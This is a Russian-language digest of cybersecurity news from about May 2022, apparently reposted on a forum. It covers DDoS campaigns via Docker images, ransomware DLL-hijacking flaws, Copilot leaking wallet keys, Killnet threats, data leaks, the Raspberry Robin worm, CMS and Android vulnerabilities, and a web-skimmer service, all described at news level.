Целью атаки являются веб-сайты правительственных и военных организаций, СМИ и розничной торговли в России и Беларуси. "Наши аналитики считают действия по развертке образа Docker автоматизированными, исходя из слишком частых взаимодействий с API платформы в определенном промежутке времени", – заявили в компании.

Второй образ Docker был загружен с Docker Hub более 50 000 раз и содержит DoS-программу под названием stoppropaganda, которая перегружает сайты из списка целей HTTP GET-запросами.

Специалисты компании заявили, что взлом ханипотов был попыткой хакеров поддержать проукраинские DDoS-атаки. "Мы уверенно можем давать такую оценку на основе списка целей IT-армии Украины.", – говорят в Crowdstrike.

Ханипот — подключенная к Интернету система, которая служит приманкой для атакующих и позволяет обнаруживать и анализировать атаки. Ханипоты используют либо для исследования атак, либо для отвлечения злоумышленников от важных объектов в сети. Есть два вида ханитопов: ханипоты для вредоносных программ и спам-ловушки.

Не так давно мы писали про другую атаку на Docker. Хакеры из LemonDuck выбрали платформу своей мишенью и устанавливали майнеры криптовалюты на системы жертв.

Эксплойт для уязвимостей в программах-вымогателях от Conti, REvil и LockBit блокирует шифрование.
image



Операторы шифровальщиков часто используют уязвимости для проникновения в корпоративные сети. Однако в программах-вымогателях тоже есть бреши, которые сумел найти специалист из MalVuln project под ником hyp3rlinx . Он изучал не только старые семейства вымогателей – REvil и Conti, но и новичков вроде Black Basta, LockBit и AvosLocker. Согласно отчетам на сайте эксперта, все шифровальщики имеют проблемы с безопасностью, которые можно использовать для остановки самого разрушительного этапа атаки – шифрования файлов.

Анализируя образцы вредоносных программ различных хакерских группировок, hyp3rlinx обнаружил у всех образцов уязвимость к перехвату DLL. Данный метод используют злоумышленники для внедрения вредоносного кода в официальные приложения.

Перехват DLL работает только в Windows-системах, используя способ поиска и загрузки необходимых DLL-файлов в память приложений. Программа с недостаточным количеством проверок может загрузить DLL за пределами своего каталога, повышая привилегии или выполняя вредоносный код.

По словам специалиста, для уязвимых образцов вымогательского ПО от Conti, REvil, LockBit, Black Basta, LockiLocker и AvosLocker, эксплойт способен завершить работу вредоносной программы перед началом шифрования. Чтобы использовать уязвимости шифровальщика, нужно скомпилировать код эксплойта в DLL-файл с определенным именем. Тогда программа-вымогатель распознает файл как собственный и загрузит для начала шифрования данных.

На видео hyp3rlinx использует перехват DLL в программе-вымогателе от REvil и успешно завершает процесс шифрования данных до его начала.
"Для защиты от этих семейств вымогателей, DLL можно поместить в место, где злоумышленники будут запускать свое ПО, например в сеть с важными данными", – сказал hyp3rlinx. "После загрузки DLL-эксплоита процесс программы-вымогателя должен завершиться до начала шифрования данных".

Исследователь отмечает, что, в то время, когда вредоносное ПО отключает системы безопасности на зараженной машине, оно не может ничего сделать против перехвата DLL, поскольку это просто файлы, хранящиеся на диске хоста и неактивные до момента запуска.

Пока неясно, какие версии вредоносных программ оказались уязвимы к обнаруженной проблеме. Если образцы новые, то эксплоит будет работать недолго, поскольку вымогатели быстро исправляют попавшие в открытый доступ ошибки. Эксплоиты могут быть рабочими еще некоторое время, но компании все равно рискуют стать жертвами вымогателей, поскольку кража данных с целью получения выкупа – неотъемлемая часть подобных угроз.

Но даже при таком раскладе эксплойты все равно окажутся полезными для предотвращения нарушений работы, способных нанести компании-жертве колоссальный ущерб.

Copilot на базе OpenAI запоминает конфиденциальные общедоступные данные.
image



По словам одного из разработчиков, инструмент для написания кода на основе OpenAI от GitHub Copilot предложил закрытые ключи от реальных криптовалютных кошельков. Программист смог вычислить реальный аккаунт, который связан с закрытым ключом.

«Это было довольно шокирующим для меня», — сказал разработчик . «Закрытый ключ подобен замку к вашим сбережениям: если произойдет утечка, ваши активы могут быть украдены».

Он поделился с журналистами закрытым ключом, сгенерированным Copilot, и связанным адресом, после чего обработал две транзакции: 0,5 ETH были отправлены на адрес другого кошелька и 0,48 ETH отправил с адреса обратно на тот же кошелек.

Другой пользователь предположил, что Copilot извлек информацию из открытых GitHub репозиториев. ИИ-помощник запомнил общедоступные данные и при правильном запросе вывел «их на поверхность», добавил он.

По всей видимости, закрытый ключ действительно отображался в общедоступных репозиториях GitHub. Программисты предположили, что его создали в целях тестирования. Кошелек активен и использовался для отправки и получения реальных токенов.
Другим разработчикам удалось найти закрытые ключи, связанные с другими криптовалютными кошельками, некоторые из которых содержали небольшую сумму денег.

В будущем мы будем чаще сталкиваться с подобными инцидентами, когда конфиденциальная информация попадает в обучающую модель, а затем ИИ раскрывает ее.

Ранее Ученые из инженерной школой Тандон Нью-Йоркского университета проверили систему на базе искусственного интеллекта GitHub Copilot с точки зрения безопасности и обнаружили , что примерно в 40% случаев сгенерированный помощником по программированию код в лучшем случае содержит ошибки, а в худшем — потенциально уязвим к атакам.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Благодаря 19-летнему специалисту была исправлена уязвимость, способная вызвать обвал фондового рынка.
image



Корбен Лео руководит собственной фирмой по кибербезопасности, сотрудничающей с Министерством обороны США. Хакеру платят деньги за взлом компьютерных систем компании и выявление уязвимостей в системе безопасности. По утверждению 22-летнего специалиста, он заработал около миллиона долларов за свои усилия с момента создания собственного бизнеса.

В 19 лет Корбен получил доступ к подводной телекоммуникационной кабельной системе TAT-14, которая действовала до 2020 года и использовалась для передачи данных из США в Великобританию, Францию, Нидерланды, Германию и Данию.

«Я наткнулся на этот веб-сервер. И название было очень интересным. Поэтому я хотел посмотреть, смогу ли я его взломать», - сказал Корбен.

«Я мог добавить доступ администратора ко всем учетным записям и управлять ими. У меня был доступ ко всей внутренней документации по кабелю. Ко всему, что имело отношение к внутренней работе кабеля, к тому, как кабель был физически структурирован, к периодам технического обслуживания», - заявил хакер.

Корбен мог спровоцировать обвал фондового рынка, вызвать обвинения в международном шпионаже или подорвать работу правительств. Лео решил сообщить об уязвимости компании, объяснив: «Я не пытался сделать слишком много, потому что это был подводный кабель. Я боялся, что меня забросят на секретный сайт ЦРУ!».

Корбен является частью глобального сообщества исследователей уязвимостей - этичных хакеров. Такие специалисты проверяют веб-серверы, выявляют недостатки безопасности и сообщают о них в обмен на оплату. Затем компании могут исправить ошибку для предотвращения взлома реальных преступников.

Также, в январе 2022 года другой 19-летний хакер из Германии Дэвид Коломбо взломал более 20 автомобилей Tesla в 13 странах мира и повлиял на улучшение системы безопасности в системе Tesla.

Killnet освободить арестованного хакера.
image



Российская хакерская группа Killnet потребовала освобождения хакера и пригрозила отключить аппараты ИВЛ, если требования не будут выполнены.

Связь группировки с российским правительством не доказана, однако, шпионские агентства альянса Five Eyes, (Австралия, Канада, Новая Зеландия, Великобритания, США) связывают Killnet и действия команды с интересами России.

«Если он не будет освобожден в течение 48 часов, я уничтожу Румынию, Великобританию и Молдову»,- предупредила группа Killnet в Telegram.

«Я уничтожу всю вашу информационную структуру и даже Министерство здравоохранения. Все аппараты ИВЛ будут отключены», - добавлено в сообщении.

Подозреваемый хакер являлся сторонником спецоперации России на Украине. Он публиковал в соцсетях российские флаги и символ Z. Киберпреступник подозревался в провокациях атак Killnet на румынскую инфраструктуру. Группа нацелилась на румынское правительство и СМИ из-за их поддержки Украины. Сообщается, что хакер был арестован сотрудниками Национального агентства по борьбе с преступностью (National Crime Agency, NCA) и официальными лицами Румынии. Арестованный хакер уже освобожден в рамках расследования.

В сотрудничестве с NCA Великобритания с помощью надежных средств киберзащиты примет меры реагирования на любой киберинцидент, способный оказать влияние на государство.

Ранее сообщалось, что группировка Killnet проводила DDoS-атаки на правительства Молдавии и Румынии из-за их поддержки Украины в спецоперации.

Утечка составила 5,8 ГБ и состояла в общей сложности из более чем полутора миллиона записей.
image



Находящийся в открытом доступе экземпляр сервера ElasticSearch содержал конфиденциальную финансовую информацию о кредитах, выданных индийскими и африканскими финансовыми службами. По словам экспертов из UpGuard, утечка составила 5,8 ГБ и состояла из 1 686 363 записей.

"Записи включали личную информацию пользователя: имя, сумму кредита, дата рождения, номер счета и многое другое", – говорится в отчете UpGuard. "В базе данных было 48 043 уникальных адреса электронной почты, некоторые из которых принадлежали администраторам сервиса, корпоративным клиентам и коллекторским агентствам, прикрепленным к каждому делу".

Специалисты из UpGuard 16 февраля 2022 года обнаружили экземпляр сервера, используемый в качестве хранилища данных для платформы по сбору долгов ENCollect. После вмешательства индийской команды CERT-In (Computer Emergency Response Team), с 28 февраля сервер был закрыт для публичного доступа. ENCollect – приложение для сбора кредитов, предоставляющее коллекторским агентствам данные о непогашенных займах. UpGuard заявила, что утекшие записи содержали в себе не только информацию о кредитах от служб Lendingkart, IndiaLends, Shubh Loans (MyShubhLife), Centrum, Rosabo и Accion, но и личные данные заемщиков.


Отредактированный пример одной записи с именем пользователя, номером мобильного телефона и метаданными кредита.

Кроме того, набор данных включал 114 747 почтовых адресов, 105 974 номера телефонов и информацию о суммах 157 403 займов. Часть записей также содержала дополнительную информацию – контакты созаявителей, членов семьи и другие личные данные.

Несмотря на то, что сервер ENCollect уже защищен, злоумышленники могут использовать утекшие данные для мошенничества, вымогательства и даже маскировки под сотрудников коллекторских агентств.

Специалисты из UpGuard говорят, что цифровизация финансовых услуг предоставляет много возможностей для повышения эффективности сервисов по типу ENCollect, но при этом создает неожиданные риски в цепочке поставок. По мнению экспертов, цифровые решения поставщиков могут стать причиной утечек, когда их наборы данных собираются из источников нескольких сторонних компаний. В прошлом месяце мы писали про утечку данных клиентов CashApp. В сеть попали данные 8,2 миллионов пользователей, включая полные имена клиентов и номера брокерских счетов.

Специалисты Red Canary обнаружили нового червя, распространяющегося с помощью USB-накопителей.
image



Вредоносное ПО связано с кластером вредоносной активности под названием Raspberry Robin, и впервые было замечено в сентябре 2021 года. Червь был найден командой разработчиков средств обнаружения Red Canary в сетях нескольких клиентов, в том числе в технологическом и производственном секторах.

Вредонос распространяется на новые системы Windows при подключении зараженного USB-накопителя, содержащего вредоносный LNK-файл. После подключения, червь с помощью командной строки создает новый процесс для запуска вредоносного файла с зараженного накопителя. Raspberry Robin использует стандартный установщик Microsoft (msiexec.exe) для связи со своими C2-серверами, размещенными на взломанных устройствах QNAP и использующими выходные узлы TOR в качестве дополнительной инфраструктуры C2.

"Хотя msiexec.exe загружает и выполняет легитимные пакеты установщика, злоумышленники используют его для загрузки вредоносного ПО", – говорят исследователи. "Raspberry Robin использует msiexec.exe и пытается связаться с вредоносным доменом C2-сервера хакеров".

Исследователи еще не выяснили, какими методами вредоносная программа противостоит удалению между перезагрузками. Специалисты считают причиной такой устойчивости вредоносный DLL-файл [ , ], устанавливаемый на скомпрометированные компьютеры.

Raspberry Robin запускает DLL с помощью двух легитимных утилит Windows:
  • fodhelper (BIN-файл для управления функциями в настройках Windows)
  • odbcconf (инструмент для настройки драйверов ODBC).
Первая позволяет обойти контроль учетных записей пользователей (UAC), а вторая выполняет и настраивает DLL.

d04aa985f7b14312270ffa915c542fd2.png




Процесс заражения системы червем Raspberry Robin.

Хотя исследователи из Red Canary смогли тщательно изучить действия червя внутри зараженных систем, у них еще остались вопросы, требующие ответа.

"Прежде всего, мы не знаем, как и где Raspberry Robin заражает внешние диски для продолжения своей деятельности. Вполне вероятно, что заражение происходит в автономном режиме или другим образом вне нашей видимости. Также нам не известно, зачем Raspberry Robin устанавливает вредоносную DLL", – заявили специалисты.

"Одно из наших предположений заключается в том, что это может быть попыткой закрепиться в зараженной системе, но для полной уверенности нам нужна дополнительная информация".

Одним из главных вопросов остаются цели Raspberry Robin, поскольку нет никакой информации о конечных задачах данного вредоносного ПО.

Дополнительную техническую информация о черве Raspberry Robin можно найти в отчете Red Canary . Отчет включает в себя индикаторы компрометации и Mitre ATT&CK вредоноса.

Уязвимость представляет собой ошибку повышения привилегий в ядре Linux.
image



Компания Google выпустила вторую часть майского исправления безопасности для Android, включающую исправление активно эксплуатируемой уязвимости ядра Linux.

Уязвимость, отслеживаемая как CVE-2021-22600 , представляет собой ошибку повышения привилегий в ядре Linux, которую злоумышленники могут использовать через локальный доступ. Уязвимость затрагивает Android, так как ОС использует модифицированное ядро Linux. Неясно, как уязвимость используется в атаках, но, скорее всего, она применяется для выполнения привилегированных команд и бокового перемещения через Linux-системы в корпоративных сетях.

Google обнаружила уязвимость в январе, но только в этом месяце она была устранена для ОС Android. "Есть признаки того, что CVE-2021-22600 может подвергаться таргетированной эксплуатации", – говорится в , опубликованном Google. Компания не раскрыла подробности атак, использующих этот недостаток.

Вот что еще было исправлено в этом месяце:
  • Четыре уязвимости, связанные повышения привилегий (EoP) и одна с утечкой информации (ID) в Android Framework.
  • Три EoP, две ID и два отказа в обслуживании (DoS) в Android System.
  • Три EoP и один ID дефект в компонентах ядра.
  • три опасных уязвимости в компонентах MediaTek.
  • 15 опасных уязвимостей и одна критическая в компонентах Qualcomm.
Исправления не распространяются на Android 9 и более старые версии, поэтому в целях безопасности Google настоятельно рекомендует пользователям со старыми версиями Android перейти на более свежую версию ОС

Всего в 2022 году в опорных центрах Национального киберполигона пройдет более 70 киберучений.
image



В Оренбургском государственном университете открылся второй в Приволжском федеральном округе опорный центр Национального киберполигона. Об этом сообщил Заместитель Председателя Правительства Дмитрий Чернышенко.

В России это восьмая учебная площадка по отработке сценариев защиты от киберугроз. По словам вице-премьера, в рамках национальной программы "Цифровая экономика" до 2024 года в стране создадут 15 опорных центров Национального киберполигона.

В этом году в опорных центрах Национального киберполигона пройдёт до 70 учений. Получить практические навыки там смогут не только профессионалы, но и студенты, подчеркнул Чернышенко.

Вице-премьер отметил, что в текущей ситуации повышается уровень ответственности ведомств и компаний за безопасность государственных, частных и персональных данных, а также информационных систем.

Уточняется, что для отработки кибератак в опорных центрах постоянно расширяется перечень отраслей. Добавлен электроэнергетический, кредитно-финансовый, корпоративный и нефтегазовый сегменты, также планируется запустить нефтеперерабатывающий, транспортный, металлургический, горнодобывающий и магистральные сети связи, чтобы закрыть потребности большинства российских организаций и проводить кросс-отраслевые учения в масштабах всей страны.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Предварительно авторизованный хакер может удаленно выполнять код и загружать произвольные файлы в систему.
image


В dotCMS, известной системе управления контентом с открытым исходным кодом, обнаружена уязвимость удаленного выполнения кода с предварительной аутентификацией.

Критическая уязвимость CVE-2022-26352 связана с атакой обхода каталога при выполнении загрузки файлов, позволяющей злоумышленнику выполнять произвольные команды на базовой системе.

"Хакер может загружать произвольные файлы в систему", – говорит Шубхам Шах в отчете Assetnote. "Загрузив JSP-файл в корневой каталог tomcat, можно добиться выполнения кода, а затем выполнения команд".

Другими словами, позволяющая загружать произвольные файлы уязвимость может быть использована для замены уже существующих файлов в системе на веб-оболочку, через которую злоумышленник может получить постоянный удаленный доступ к устройству.


HTTP-запрос, позволяющий загружать JSP-оболочку в доступный веб-каталог, используя CVE-2022-26352.

"Когда файлы загружаются в dotCMS через API Content, система управления контентом сначала записывает файлы во временный каталог, только после чего они становятся контентом", – заявили в компании. "В случае этой уязвимости dotCMS не проверяет имя основного файла, переданное в заголовке многокомпонентного запроса, а следовательно и имя временного файла".

Хотя эксплоит позволял записывать данные в произвольные файлы JavaScript, обслуживаемые приложением, исследователи заявили, что уязвимость может быть использована для удаленного выполнения команд.

AssetNote заявила, что обнаружила и сообщила о уязвимости 21 февраля 2022 года, после чего были выпущены исправления в версиях 22.03, 5.3.8.10 и 21.06.7.

Недавно мы писали про исправления уязвимостей в Tomcat. Бреши позволяли злоумышленникам осуществить DoS-атаку или обойти ограничения доступа к файлам.

Пользователи не смогут давать разрешения на доступ приложениям, загруженным не из Google Play Store.
image



Google повысит защиту от взлома злоумышленников и внедрения вредоносных программ в устройства. Корпорация не позволит загруженным приложениям использовать API специальных возможностей (Accessibility API).

Многие злоумышленники путем обмана заставляют пользователей устанавливать вредоносный APK за пределами официального магазина приложений и получают доступ к устройству. Android 13 не позволит пользователям предоставлять сторонним приложениям доступ к службам специальных возможностей и затруднит взлом телефона.


После появления в диалоговом окне сообщения о том, что службы специальных возможностей для приложения ограничены, пользователь может активировать доступ с помощью пункта меню «Разрешить ограниченные настройки» под информационным экраном приложения в правом верхнем углу. Вредоносное приложение может указать пользователю включить ограниченные настройки и обойти ограничение. Возможно, Google исправит уязвимость до выхода стабильной версии Android 13.


Новое правило влияет и на приложения из Google Play. При загрузке более старой версии приложения Sleep as Android с сайта APK Mirror службы специальных возможностей остаются неактивными. Ограничение не исчезло даже после обновления приложения до последней версии в Play Store. Также важно отметить, что Google ограничила только стороннюю загрузку приложений. Альтернативные приложения F-Droid или Amazon App Store не будут иметь никаких ограничений.

Более того, приложения Google Play Store не могут использовать службы специальных возможностей за исключением случаев, когда приложение предназначено именно для служб специальных возможностей. Кроме того, разработчикам нужно доказать Google, что их приложение безопасно. Тем не менее, корпорация настоятельно не рекомендует использовать службы специальных возможностей в приложениях. Также Google больше не позволяет приложениям для записи звонков использовать службу специальных возможностей.

Президент США Джо Байден в среду издал два указа, направленных на опережение других стран в области квантовых вычислений и криптографии.
image



Согласно официальному заявлению , недавние прорывы в области квантовой информатики (Quantum Information Science, QIS) показывают потенциал технологии для «стимулирования инноваций во всей американской экономике, от энергетики до медицины, благодаря достижениям в области вычислений, сетей и зондирования».

«Исследования показывают, что в какой-то момент в недалеком будущем, когда квантовые компьютеры достигнут достаточного размера и уровня сложности, они будут способны взломать большую часть криптографии, которая в настоящее время обеспечивает безопасность наших цифровых коммуникаций в Интернете», - сказано в заявлении.

«Криптоаналитически значимый квантовый компьютер может поставить под угрозу гражданскую и военную связь, а также подорвать системы контроля и управления критически важной инфраструктурой», - предупредил директор АНБ (National Security Agency, NSA) США Пол М. Накасоне в заявлении.

«Защита номер один от этой угрозы квантовых вычислений заключается во внедрении квантово-устойчивой криптографии в наших самых важных системах», - добавил Накасоне.

Задачи в рамках меморандума включают такие пункты, как криптографические стандарты NIST , установление требований к инвентаризации существующих систем и создание рабочих групп государственного сектора для содействия сотрудничеству. Все задачи должны быть выполнены NIST, АНБ и Агентством по кибербезопасности и защите инфраструктуры (Cybersecurity and Infrastructure Security Agency, CISA) в срок от 90 дней до 1 года.

Хотя в документах не упоминается Китай, контекст подразумевает конкуренцию с Поднебесной, так как она инвестирует в квантовые вычисления. Пекин потребовал новых прорывов в области квантовых вычислений к 2030 году. Конгресс США назвал 2030 год началом эры, когда обычное шифрование станет небезопасным при атаке квантовых систем.

Также, в апреле США и 60 стран-партнеров объединились , чтобы установить новые глобальные правила для Интернета.

Неавторизованный пользователь может использовать уязвимость для кражи учетных данных.
image



Разработчики исправили критическую уязвимость в Snipe-IT, которая может быть использована для отправки пользователям вредоносных запросов на сброс пароля. Snipe-IT – облачный проект компании Grokability с открытым исходным кодом для управления IT-активами пользователей. Популярная система была разработана в качестве замены Excel-таблиц и насчитывает около 3,4 миллиона пользователей, а также более 6,7 миллиона управляемых активов.

2 мая проект раскрыл критическую уязвимость CVE-2022-23064 с рейтингом CVSS 8.8. Уязвимость описывается как инъекция заголовка хоста. Проблемы с заголовками хоста возникают при небезопасной обработке серверной связи и могут привести к различным проблемам, включая отравление веб-кэша, подделку запросов на стороне сервера (SSRF) или атаки SQL-инъекций. В случае Snipe-IT, CVE-2022-23064 позволяла злоумышленникам отправлять поддельные заголовки хостов в функцию сброса пароля системы.

Жертвам отправляли ссылки для сброса пароля, перенаправляющие на контролируемый злоумышленниками сервер. Разработчики утверждают, что после этого можно украсть токены сброса пароля, а следом и аккаунт пользователя.

По словам White Source примерный сценарий атаки выглядит так:
  • Злоумышленник выбирает функцию восстановления пароля, потом вводит имя аккаунта жертвы.
  • После нажатия кнопки для восстановления аккаунта с помощью почты, запрос перехватывается, а заголовок хоста подделывается.
  • Если жертва нажмет на вредоносную ссылку с измененным базовым URL, то токен сброса пароля будет использован и скомпрометирован.

Эксперты считают, что атака запускается только после взаимодействия с пользователем, но для активации уязвимости не требуется авторизация или привилегии.

Уязвимы версии Snipe-IT от 3.0-alpha до 5.3.7. Эксперты настоятельно рекомендуют пользователям обновить версию сервиса минимум до 5.3.8.

5.4.4 , одна из последних доступных сборок, содержит исправление межсайтового скриптинга.

В беседе с изданием The Daily Swig технический директор Grokability Брэди Ветерингтон заявил об отсутствии доказательств использования CVE-2022-23064 в дикой природе и что платформа никогда не была уязвима из-за своей конфигурации.

В частности, было отправлено более 100 миллионов сообщений для "борьбы с московской пропагандой".
image



Anonymous продолжает кибервойну против российского бизнеса и государственных организаций. Ниже приведен список самых последних организаций, атакованных коллективом, которые также слили украденные данные через платформу DDoSecrets:
  • CorpMSP — федеральная организация, оказывающая поддержку малому и среднему бизнесу. Контролирующим акционером CorpMSP является Российская Федерация. По данным группы хактивистов NB65 , CorpMSP якобы используется как подставная компания для цифровых шпионов и поддерживает операции Минобороны России. Просочившиеся файлы задокументировали эти обвинения , однако они были быстро удалены из Mega . Согласно NB65, 9 ГБ файлов включали клиентские контракты и файлы изображений контрактов Министерства обороны. Группа, связанная с Anonymous, слила архив размером 482,5 ГБ, содержащий 75 000 файлов, электронных писем и образов дисков из CorpMSP.
  • ООО «Капитал — специализированная бухгалтерская фирма, работающая с группой « САФМАР» Михаила Гуцериева и ее активами, включая ПАО «РуссНефть». Anonymous опубликовали архив размером 20,4 ГБ, содержащий 31 990 электронных писем от LLC Capital.
На этой неделе хакерская группа @squad3o3 заявила, что с ее служб в Россию было отправлено более 100 миллионов сообщений для "борьбы с московской пропагандой".

На этой неделе коллектив хактивистов Ukraine IT Army запустил серию DDoS-атак на российские объекты, вызвавшие серьезные проблемы. Одной из целей атаки стал портал Единой государственной автоматизированной информационной системы учета алкоголя (ЕГАИС) , который считается ключевым для дистрибуции алкоголя в России.

Атаки на сайты ЕГАИС произошли 2 и 3 мая, а о сбоях сообщалось 4, призыв к атаке на сайт был распространен внутри сообщества IT-армии Украины. Из-за последствий атаки заводы не могут принимать цистерны со спиртом, а покупатели (как магазины, так и дистрибьюторы) не имеют возможности получать готовую продукцию, которая им уже доставлена, Многие фабрики полностью прекратили отгрузки на склады и впоследствии сократили объемы производства.

На этой неделе исследователи Crowdstrike сообщили , что проукраинские хакеры, которые, вероятно, связаны с Украинской ИТ-армией , используют образы Docker для запуска DDoS атака против дюжины веб-сайтов, принадлежащих правительству, военным и медиа-агентствам. DDoS-атаки также были направлены на три веб-сайта литовских СМИ.

На восстановление сервисов компании AGCO потребуется несколько дней или больше.
image


Крупнейший в США производитель сельскохозяйственной техники AGCO сообщил , что стал жертвой атаки с использованием вымогательского ПО, затронувшей некоторые его производственные объекты.

«AGCO все еще расследует масштабы атаки, но ожидается, что бизнес-операции будут сорваны, и на восстановление сервисов потребуется несколько дней или больше, в зависимости от того, насколько быстро компания сможет восстановить свои системы», – сообщили представители AGCO.

AGCO является крупным игроком на рынке сельхозтехники – его годовой доход превышает $9 млрд, а штат насчитывает порядка 21 тыс. сотрудников. Компании также принадлежат такие бренды, как Fendt, Massey Ferguson, Challenger, Gleaner и Valtra. Поэтому любые срывы производства могут отрицательно повлиять на цепочку поставок.

В последнее время киберпреступники активно атакуют сельхозпредприятия в США. В прошлом месяце ФБР предупредило сельскохозяйственный сектор об атаках вымогательского ПО. Бюро упомянуло в уведомлении кибератаки на шесть предприятий во время сбора урожая осенью 2021 года и две атаки в начале 2022 года, способные негативно повлиять на посевной сезон и поставки семян.

Аналогичное предупреждение ФБР выпустило в сентябре прошлого года после вымогателей на крупных поставщиков продовольствия NEW Cooperative и Crystal Valley.

Все предприятия, непосредственно связанные с производством и поставкой продуктов питания, считаются объектами критической инфраструктуры, и атакуются хакерами с целью получения большой финансовой выгоды.
 
Вышла Kaspersky Endpoint Security Cloud Pro с дополнительными функциями

Вышла Kaspersky Endpoint Security Cloud Pro с дополнительными функциями Екатерина Быстрова 06 Мая 2022 - 21:00 Корпорации Лаборатория Касперского Kaspersky Endpoint Security Cloud Защита конечных точек сети Сетевая безопасность ... Вышла Kaspersky Endpoint Security Cloud Pro с дополнительными функциями «Лаборатория Касперского» выпустила продвинутую версию своего облачного решения — Kaspersky Endpoint Security Cloud Pro. В дополнение к базовым функциям защиты и управления в продукте есть возможности автоматизированного реагирования на инциденты, контроля программ, удалённой очистки данных. Также он включает в себя тренинги по кибербезопасности для IT-специалистов.

По данным «Лаборатории Касперского», растущая сложность IT-инфраструктуры и необходимость повышать квалификацию специалистов по защите информационных систем — это два основных фактора, которые стимулируют малый и средний бизнес увеличивать инвестиции в кибербезопасность.

Высокий спрос на выявление и устранение продвинутых атак был подтверждён заинтересованностью бизнеса в функции «Анализ первопричин», которая позволяет получить представление о цепочке атаки. Эту опцию, доступную в версии Kaspersky Endpoint Security Cloud Plus, активировали около 80% пользователей продукта. В версию Kaspersky Endpoint Security Cloud Pro включена базовая EDR-функциональность, которая позволяет IT-администраторам не только визуализировать путь распространения атаки, но и реагировать на неё всего за несколько нажатий. Предлагается несколько вариантов действий: отправлять подозрительные файлы на карантин; изолировать хосты, чтобы прекратить дальнейшее распространение по сети; искать индикаторы компрометации. Если атака была обнаружена и остановлена на одном компьютере, администратор может найти индикаторы компрометации на других устройствах.

Также в решение встроен онлайн-тренинг, с помощью которого IT-специалисты могут получить навыки, необходимые для управления базовыми процессами кибербезопасности. Тренинг включает в себя теоретическую и практическую части, упражнения, интерактивные задания в симулированной среде. Обучающие модули открываются в облачной веб-консоли администратора.

Kaspersky Endpoint Security Cloud Pro, как и версия Plus, обеспечивает контроль веб-ресурсов и внешних устройств. В дополнение в решение добавлен функционал контроля программ, а также адаптивный контроль аномалий. Этот компонент отслеживает и блокирует операции, нетипичные для компьютеров в корпоративной сети. Также новый продукт позволяет удалённо стирать данные, если устройство будет потеряно или украдено, и не допускает подключения к компьютеру заражённых USB-устройств, имитирующих клавиатуру, благодаря компоненту BadUSB. «Кибербезопасность находится в списке главных приоритетов для компаний, которые проходят через цифровую трансформацию и заинтересованы в том, чтобы быстро адаптироваться к новым трендам, в то же время не оставляя без защиты свои процессы и услуги. Мы разработали Kaspersky Endpoint Security Cloud Pro, чтобы предложить наиболее современные технологии защиты в простом и доступном формате», — комментирует Александр Коробко, старший менеджер по продуктовому маркетингу в «Лаборатории Касперского».

Больше информации о Kaspersky Endpoint Security Cloud доступно по
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Взлом Docker, утечка данных с российских предприятий и угрозы больницам Великобритании.
image


В этом материале представлены наиболее значимые события кибербезопасности, связанные с военным конфликтом России и Украины за прошедшую неделю.
07 мая - Система быстрых платежей подверглась разрушительной DDoS атаке

На проблемы при переводах денег пожаловались клиенты Сбера, ВТБ, Тинькофф Банка и Промсвязьбанка.

06 мая — Anonymous и Украинская ИТ-армия продолжают атаковать российские организации

Коллектив Anonymous и волонтерская группа «Украинская ИТ-армия» продолжают проводить кибератаки на российские организации.

06 мая — Украинская ИТ-армия атаковала портал ЕГАИС , влияя на дистрибуцию алкоголя в России.

Украинская ИТ-армия провела массированные DDoS-атаки на портал ЕГАИС, играющий ключевую роль в дистрибуции алкоголя в России.

06 мая – Killnet угрожает отключить аппараты ИВЛ в больницах Великобритании

Российская хакерская группа Killnet потребовала освобождения хакера и пригрозила отключить аппараты ИВЛ, если требования не будут выполнены.

04 мая — Проукраинские злоумышленники скомпрометировали образы Docker для запуска DDoS-атак на российские сайты.

Исследователи из компании CrowdStrike обнаружили DoS-атаку, взломавшую ханипоты Docker Engine. Атака была направлена на российские и белорусские сайты в условиях продолжающейся спецоперации на Украине. Проукраинские злоумышленники скомпрометировали образы Docker для запуска DDoS-атак на российские сайты.

Новый ресурс работает по модели «скиммер как услуга» (skimmer-as-a-service).
image



Среди киберпреступников растет популярность сервиса Caramel, продающего web-скиммеры для кражи данных кредитных карт.

Web-скиммеры – это вредоносные скрипты, внедряемые во взломанные сайты электронной коммерции и ждущие, когда жертва сделает на нем покупку. Как только жертва заполняет форму заказа на сайте, вредоносные скрипты отправляют данные ее кредитной карты на подконтрольный киберпреступникам удаленный сервер. С помощью этих данных злоумышленники могут совершать online-покупки. Кроме того, они могут продать их другим киберпреступникам на подпольных торговых площадках.

Специалисты из Domain Tools обнаружили новый ресурс, работающий по модели «скиммер как услуга» (skimmer-as-a-service). По их словам, оператором сервиса является российская киберпреступная группировка CaramelCorp.

Caramel поставляет своим подписчикам вредоносные скрипты, инструкции по их развертыванию и панель управления вредоносными операциями. Однако стать подписчиками сервиса могут только русскоязычные хакеры, прошедшие предварительный процесс отбора, в ходе которого отсеиваются малоопытные киберпреступники и те, кто пользуются машинным переводом.

Пожизненная подписка на сервис стоит $2 тыс. За эти деньги его операторы обещают подписчикам полную техподдержку, обновления кода и улучшения механизмов обхода обнаружения. Если верить CaramelCorp, их скиммеры способны обходить защиту от Cloudflare, Akamai, Incapsula и пр.

Клиентам сервиса предоставляется быстрая инструкция по методам JavaScript, хорошо работающим на определенных системах управления контентом сайтов (CMS).

Поскольку скиммеры написаны на JavaScript, Caramel предлагает клиентам различные техники обфускации для обхода обнаружения.

Данные кредитных карт собираются с помощью метода setInterval(), извлекающего информацию через фиксированные промежутки времени. Хотя этот метод не кажется эффективным, с его помощью можно похищать данные даже из корзин покупателей и незавершенных покупок.

Управление вредоносными операциями осуществляется с помощью специальной панели, на которой отображаются взломанные хакерами online-магазины и можно управлять шлюзами для получения похищенных данных.

План восстановления предусматривает 10 миллионов левов
image



Как сообщает bourgas.ru, целью кибератаки на Почту Болгарии было вызвать максимальное напряжение в обществе в этой балканской стране. Об этом заявил в новый исполнительный директор Почты Болгарии — Богдан Теофанидис.

С момента вступления в должность нового руководства информация о кибератаках на компанию поступала по разным каналам, все будет проверено и будут приняты соответствующие меры, заверил Теофанидис.

Он поблагодарил сотрудников почтовых отделений, которые продолжали работать, несмотря на проблемы.

«Я признался в миссии по возрождению Почты Болгарии. Это не просто оператор рынка, это бесценный государственный капитал и институт», — сказал Богдан. Теофанидис.

Теофанидис призвал клиентов не собираться утром в первый день пенсионных выплат и распределять свое время, чтобы избежать лишнего стресса.

«Все силы работают над установлением фактов кибератаки на Почту Болгарии и восстановлением услуг обществу», — сказал исполнительный директор.

